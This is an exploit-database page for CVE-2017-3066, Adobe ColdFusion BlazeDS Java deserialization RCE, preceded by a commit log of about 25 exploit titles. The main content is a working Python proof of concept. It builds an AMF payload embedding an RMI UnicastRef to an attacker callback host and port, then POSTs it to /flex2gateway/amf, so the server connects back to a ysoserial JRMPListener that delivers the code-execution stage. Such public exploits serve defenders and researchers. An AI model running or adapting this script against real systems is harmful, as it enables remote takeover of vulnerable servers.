2c4b08963a
25 changes to exploits/shellcodes QNAP NAS Devices - Heap Overflow QNAP NVR/NAS - Buffer Overflow (PoC) QNAP NVR/NAS Devices - Buffer Overflow (PoC) Cisco ASA - Crash PoC Asterisk 13.17.2 - 'chan_skinny' Remote Memory Corruption Android - 'getpidcon' Permission Bypass in KeyStore Service Multiple OEM - 'nsd' Remote Stack Format String (PoC) HP-UX 11.0 - pppd Stack Buffer Overflow HP-UX 11.0 - 'pppd' Local Stack Buffer Overflow SGI IRIX - 'LsD' Multiple Buffer Overflows SGI IRIX - 'LsD' Multiple Local Buffer Overflows PostScript Utilities - 'psnup' Argument Buffer Overflow PostScript Utilities - 'psnup' Local Buffer Overflow Open Cubic Player 2.6.0pre6/0.1.10_rc5 - Multiple Buffer Overflows Open Cubic Player 2.6.0pre6/0.1.10_rc5 - Multiple Local Buffer Overflows MalwareFox AntiMalware 2.74.0.150 - Privilege Escalation Geovision Inc. IP Camera/Video/Access Control - Multiple Remote Command Execution / Stack Overflow / Double Free / Unauthorized Access Geovision Inc. IP Camera & Video - Remote Command Execution Axis SSI - Remote Command Execution / Read Files Axis Communications MPQT/PACS - Heap Overflow / Information Leakage Adobe Coldfusion 11.0.03.292866 - BlazeDS Java Object Deserialization Remote Code Execution Herospeed - 'TelnetSwitch' Remote Stack Overflow / Overwrite Password / Enable TelnetD Uniview - Remote Command Execution / Export Config (PoC) Vitek - Remote Command Execution / Information Disclosure (PoC) Vivotek IP Cameras - Remote Stack Overflow (PoC) Dahua Generation 2/3 - Backdoor Access HiSilicon DVR Devices - Remote Code Execution JiRos Banner Experience 1.0 - Unauthorised Create Admin JiRos Banner Experience 1.0 - Unauthorized Create Admin Doctor Search Script 1.0.2 - Persistent Cross-Site Scripting Multilanguage Real Estate MLM Script - Persistent Cross-Site Scripting Naukri Clone Script - Persistent Cross-Site Scripting Hot Scripts Clone Script Classified - Persistent Cross-Site Scripting Online Test Script 2.0.7 - 'cid' SQL Injection Entrepreneur Dating Script 2.0.2 - Authentication Bypass
37 lines
No EOL
1.5 KiB
Python
Executable file
37 lines
No EOL
1.5 KiB
Python
Executable file
# Exploit Title: Adobe Coldfusion BlazeDS Java Object Deserialization RCE
|
|
# Date: February 6, 2018
|
|
# Exploit Author: Faisal Tameesh (@DreadSystems)
|
|
# Company: Depth Security (https://depthsecurity.com)
|
|
# Version: Adobe Coldfusion (11.0.03.292866)
|
|
# Tested On: Windows 10 Enterprise (10.0.15063)
|
|
# CVE: CVE-2017-3066
|
|
# Advisory: https://helpx.adobe.com/security/products/coldfusion/apsb17-14.html
|
|
# Category: remote
|
|
|
|
# Notes:
|
|
# This is a two-stage deserialization exploit. The code below is the first stage.
|
|
# You will need a JRMPListener (ysoserial) listening at callback_IP:callback_port.
|
|
# After firing this exploit, and once the target server connects back,
|
|
# JRMPListener will deliver the secondary payload for RCE.
|
|
|
|
import struct
|
|
import sys
|
|
import requests
|
|
|
|
if len(sys.argv) != 5:
|
|
print "Usage: ./cf_blazeds_des.py target_IP target_port callback_IP callback_port"
|
|
quit()
|
|
|
|
target_IP = sys.argv[1]
|
|
target_port = sys.argv[2]
|
|
callback_IP = sys.argv[3]
|
|
callback_port = sys.argv[4]
|
|
|
|
amf_payload = '\x00\x03\x00\x00\x00\x01\x00\x00\x00\x00\xff\xff\xff\xff\x11\x0a' + \
|
|
'\x07\x33' + 'sun.rmi.server.UnicastRef' + struct.pack('>H', len(callback_IP)) + callback_IP + \
|
|
struct.pack('>I', int(callback_port)) + \
|
|
'\xf9\x6a\x76\x7b\x7c\xde\x68\x4f\x76\xd8\xaa\x3d\x00\x00\x01\x5b\xb0\x4c\x1d\x81\x80\x01\x00';
|
|
|
|
url = "http://" + target_IP + ":" + target_port + "/flex2gateway/amf"
|
|
headers = {'Content-Type': 'application/x-amf'}
|
|
response = requests.post(url, headers=headers, data=amf_payload, verify=False) |